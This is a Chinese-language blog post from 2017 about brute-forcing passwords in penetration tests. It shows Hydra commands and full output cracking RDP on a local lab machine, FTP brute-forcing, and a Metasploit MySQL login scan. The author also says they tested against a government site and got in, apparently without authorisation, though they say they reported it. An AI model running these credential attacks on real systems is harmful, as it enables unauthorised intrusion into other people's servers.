W3bSafe
首发于W3bSafe
浅谈爆破在渗透测试中的重要性.

浅谈爆破在渗透测试中的重要性.

i春秋首发 在论坛发了一次 再来知乎来一次 噗嗤.
浅谈爆破在渗透测试中的用途._网站安全_i春秋社区-分享你的技术,为安全加点温度

在安全中 最大的安全漏洞莫过于密码 本次文章来说一下 爆破在渗透测试中的用途
或许有些小伙伴在渗透测试中 找不到注入点 或者储存xss 等一系列的漏洞的时候会选择放弃 但是你们有没有想过 爆破在渗透测试中也有这巨大的用途
上次我发了几篇帖子 都是用burp爆破后成功渗透的 用的团队号发的 论坛用户搜索W3bSafe团队 咳咳。
测试环境
Kali
03主机


爆破后台用户名以及密码的话 当然 windows下最好的爆破工具非burp莫属 但是在linux下 有一块特别好用的爆破工具 :hydra(九头蛇)

官方翻译后为
最大的安全漏洞之一是密码,每个密码安全研究显示。 Hydra是一个parallized登录cracker,支持多种协议攻击。新模块很容易添加,除此之外,它是灵活和非常快。

Hydra在Linux,Windows / Cygwin,Solaris 11,FreeBSD 8.1和OSX上进行测试,并且通过特殊的OpenSSL许可证扩展在GPLv3下可用。

目前此工具支持:
AFP,Cisco AAA,Cisco auth,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS- FORM- GET,HTTPS- -POST,HTTPS-GET,HTTPS-HEAD,HTTP代理,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle侦听器,Oracle SID,Oracle,PC-Anywhere,PCNFS,POP3,POSTGRES ,RDP,Rexec,Rlogin,Rsh,SAP / R3,SIP,SMB,SMTP,SMTP Enum,SNMP,SOCKS5,SSH(v1和v2),Subversion,Teamspeak(TS2),Telnet,VMware-Auth,VNC和XMPP。
参数说明
root@xaiSec:~# hydra -help
Hydra v7.4.2(c)2012 by van Hauser / THC&David Maciejak - 仅供法律用途
 
语法:hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]] | [service:// server [:PORT] [/ OPT]]
 
选项:
  -R恢复先前中止/崩溃的会话
  -S执行SSL连接
  -s PORT如果服务在不同的默认端口,请在此处定义
  -l LOGIN或-L FILE使用LOGIN名称登录,或从FILE加载几个登录
  -p PASS或-P FILE尝试密码PASS,或从FILE加载多个密码
  -x MIN:MAX:CHARSET password bruteforce generation,键入“-x -h”获取帮助
  -e nsr尝试“n”空密码,“s”登录为pass和/或“r”反向登录
  -u环绕用户,不是密码(有效!隐含与-x)
  -C FILE冒号分隔的“login:pass”格式,而不是-L / -P选项
  -M FILE并行攻击的服务器列表,每行一个条目
  -o FILE写找到的登录/密码对到FILE而不是stdout
  -f / -F退出时,找到登录/传递对(-M:-f每个主机,-F全局)
  -t TASKS并行运行TASKS连接数(每个主机,默认值:16)
  -w / -W响应的等待时间(32s)/每个线程连接之间
  -4 / -6优选IPv4(默认)或IPv6地址
  -v / -V / -d详细模式/ show login + pass每个尝试/调试模式
  -U服务模块使用详细信息
  服务器目标服务器(使用此OR或-M选项)
  服务服务破解。支持的协议:afp cisco cisco-enable cvs firebird ftp ftps http [s] - {head | get} http [s] - {get | post} -form http-proxy http-proxy-urlenum icq imap [s] irc ldap2 [ s] ldap3 [ - {cram | digest} md5] [s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh sip smb smtp [s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet [s] vmauthd vnc xmpp
  OPT一些服务模块支持附加输入(-U用于模块帮助)
对代理使用HYDRA_PROXY_HTTP / HYDRA_PROXY和HYDRA_PROXY_AUTH环境。
 
Hydra是一个工具,猜测/破解有效的登录/密码对 - 只允许使用
为法律目的。最新版本可在[url]http://www.thc.org/thc-hydra[/url]
以下服务未编译:sapr3 oracle。
 
例子:
  hydra -l john -p doe 192.168.0.1 ftp
  hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN
  hydra -l admin -P pass.txt http-proxy://192.168.0.1
  hydra -C defaults.txt -6 pop3s:// [fe80 :: 2c:31ff:fe12:ac11]:143 / DIGEST-MD5

当然 我们先来尝试下爆破服务器
我们把192.168.0.128这台03主机当做服务器


当然 php环境是我在03主机运行的

192.168.0.128/ 当做我们想渗透的网址
接着我们踩点 首先模拟 不知道这个网站的IP
我们来ping一下 得知这个网站IP为192.168.0.128


接着我们来用Hydra来爆破一下
这里我随便弄了个Password 字典 把他放在了root目录下 先来讲一下 在知道用户名是administrator的情况下 如何使用九头蛇爆破
用户名为 administrator

当然 爆破很快的

输出结果如下

root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator  -P /root/pass  -V 
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
 
Hydra ([url]http://www.thc.org/thc-hydra[/url]) starting at 2017-03-19 21:54:27
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 18 login tries (l:1/p:18), ~1 try per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 18 [child 0]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 18 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 18 [child 2]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 18 [child 3]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 18 [child 4]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 18 [child 5]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 18 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 18 [child 7]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 18 [child 8]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 18 [child 9]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 18 [child 10]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 18 [child 11]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 18 [child 12]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 18 [child 13]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 18 [child 14]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 18 [child 14]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 18 [child 15]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 20 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 20 [child 11]
[3389][rdp] host: 192.168.0.128   login: administrator   password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra ([url]http://www.thc.org/thc-hydra[/url]) finished at 2017-03-19 21:54:32

我们来看 最下面的 红色部分

[3389][rdp] host: 192.168.0.128   login: administrator   password: admin

用户名为administrator 密码为 admin
接着我们来说一下 参数问题

root@xaiSec:~# hydra 192.168.0.128 rdp -l administrator  -P /root/pass  -V

hydra IP 服务协议 -l 指定用户名 -P 字典位置 -V 详细信息
-L 大写的话 后面我们要填上我们的username字典位置(在我们不知道username的情况下)
列入

hydra 192.168.0.128 rdp -L /root/user -P /root/pass  -V

输出结果如下

root@xaiSec:~# hydra 192.168.0.128 rdp -L /root/user -P /root/pass  -V
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
 
Hydra ([url]http://www.thc.org/thc-hydra[/url]) starting at 2017-03-19 22:03:58
[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover
[DATA] 16 tasks, 1 server, 234 login tries (l:13/p:18), ~14 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "admin" - 1 of 234 [child 0]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "111" - 2 of 234 [child 1]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "22" - 3 of 234 [child 2]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 4 of 234 [child 3]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 5 of 234 [child 4]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 6 of 234 [child 5]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 7 of 234 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 8 of 234 [child 7]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2" - 9 of 234 [child 8]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "2222" - 10 of 234 [child 9]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "333333333333" - 11 of 234 [child 10]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "fhdf" - 12 of 234 [child 11]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jg" - 13 of 234 [child 12]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 14 of 234 [child 13]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 15 of 234 [child 14]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "jgf" - 16 of 234 [child 14]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "ng" - 16 of 234 [child 15]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 17 of 235 [child 6]
[ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 18 of 235 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 18 of 235 [child 6]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 19 of 235 [child 7]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 20 of 235 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "j" - 21 of 235 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "administrator" - pass "" - 21 of 235 [child 6]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 21 of 235 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "admin" - 21 of 235 [child 7]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 235 [child 5]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "22" - 21 of 236 [child 5]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 22 of 238 [child 2]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 23 of 239 [child 13]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 24 of 240 [child 1]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 1]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 25 of 240 [child 12]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 26 of 242 [child 9]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 11]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 242 [child 9]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2" - 27 of 243 [child 11]
[3389][rdp] host: 192.168.0.128   login: administrator   password: admin
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 28 of 244 [child 0]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 244 [child 8]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "2222" - 29 of 244 [child 0]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "333333333333" - 29 of 245 [child 8]
[ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 30 of 246 [child 10]
[ATTEMPT] target 192.168.0.128 - login "fhfahreyrey" - pass "admin" - 37 of 246 [child 15]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "fhdf" - 37 of 247 [child 10]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 37 of 248 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "admin" - 55 of 248 [child 3]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[RE-ATTEMPT] target 192.168.0.128 - login "dghfhf" - pass "111" - 55 of 249 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "111" - 56 of 250 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "22" - 57 of 251 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 58 of 252 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 59 of 253 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 60 of 254 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 61 of 255 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 62 of 256 [child 4]
[ATTEMPT] target 192.168.0.128 - login "dhfhdfjdgjgdj" - pass "2" - 63 of 257 [child 4]
[ERROR] Too many connect errors to target, disabling rdp://192.168.0.128:3389
0 of 1 target successfully completed, 1 valid password found
[INFO] Writing restore file because 1 server scan could not be completed
[ERROR] 1 target was disabled because of too many errors
Hydra ([url]http://www.thc.org/thc-hydra[/url]) finished at 2017-03-19 22:04:04

成功连接

嘿嘿 本地测试嘛~

爆破虚拟主机

hydra IP ftp -L /root/user -P /root/pass -V
这里我拿一个gov的站做测试 噗嗤 已提交到漏洞盒子

我们可以看到 不管 什么密码 都能登录 未授权就可以访问虚拟主机 我们来登录一下

这就可怕了 真的进来了

当然 在Metasploit中 也有很多爆破模块
爆破3306数据库 我在我kali下已经搭建好了MySQL数据库

配置Metasploit

msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(mysql_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(mysql_login) > set USERNAME test
USERNAME => test
msf auxiliary(mysql_login) > set PASS_FILE /root/pass
PASS_FILE => /root/pass
msf auxiliary(mysql_login) > run
 
[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31
[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:'test' with password:''
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'test' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

讲解一下

use auxiliary/scanner/mysql/mysql_login  //调用模块
set RHOSTS 127.0.0.1  //设置数据库地址 我本机的 当然是 127.0.0.1
set USERNAME test //我设置的MySQL数据库用户为test 当然 不知道的话 可以set USER_FILE 字典目录  爆破
set PASS_FILE /root/pass //使用root/pass的字典 字典位置
run 开始爆破
[*] 127.0.0.1:3306 MYSQL - Found remote MySQL version 5.5.31
[*] 127.0.0.1:3306 MYSQL - [01/15] - Trying username:'test' with password:''
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'test' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[+] 127.0.0.1:3306 - SUCCESSFUL LOGIN 'test' : ''

中 密码为空

连接成功如下

root@xaiSec:~# mysql -u test -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 54
Server version: 5.5.31-0+wheezy1 (Debian)
 
Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql>

因为没有密码 所以在输入密码的这里 我们直接回车 就行了

我记得 有一个网站叫啥 caimima 利用人性的弱点 好像不能进了 咳咳。
当然 爆破配合社会工程学 会让渗透测试人员如虎添翼.


另外 小伙伴们 你们的服务器密码 是弱的嘛 如果是的话建议弄字母 数字 字符啥的 ~


-- W3bSafe团队成员 小爱_Joker

编辑于 2017-03-20

文章被以下专栏收录